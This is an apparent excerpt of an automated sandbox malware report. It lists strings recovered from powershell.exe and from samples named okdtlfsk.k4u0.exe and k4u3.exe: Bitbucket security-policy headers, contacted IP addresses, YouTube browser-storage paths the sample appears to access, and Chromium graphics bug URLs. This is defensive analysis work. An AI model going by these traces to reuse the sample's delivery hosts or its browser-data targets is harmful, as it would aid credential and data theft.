https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmpString found in memory: content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmpString found in memory: content-security-policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmpString found in memory: content-security-policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D196000.00000004.00000800.00020000.00000000.sdmpString found in memory: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in memory: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                        Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
                        Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                        Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                        Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@|-7p equals www.youtube.com (Youtube)
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,^q equals www.youtube.com (Youtube)
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,^q#www.youtube.com_0.indexeddb.le equals www.youtube.com (Youtube)
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1085
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136dumpTranslatedShadersWrite
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1452
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1452expandIntegerPowExpressionsThe
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1512
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1637
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1936
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2046
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2152
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2152skipVSConstantRegisterZeroIn
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2273
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2894
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2978
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3027
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3246
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3246allowClearForRobustResourceInitSome
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3682
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3682allowES3OnFL100Allow
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3729
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3997
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4214
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4267
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4646
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/482
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007disableDrawBuffersIndexedDisable
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5469
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5577
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658forceGlErrorCheckingForce
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750forceRobustResourceInitForce-enable
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036dumpShaderSourceWrite
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279cacheCompiledShaderEnable
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7527
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
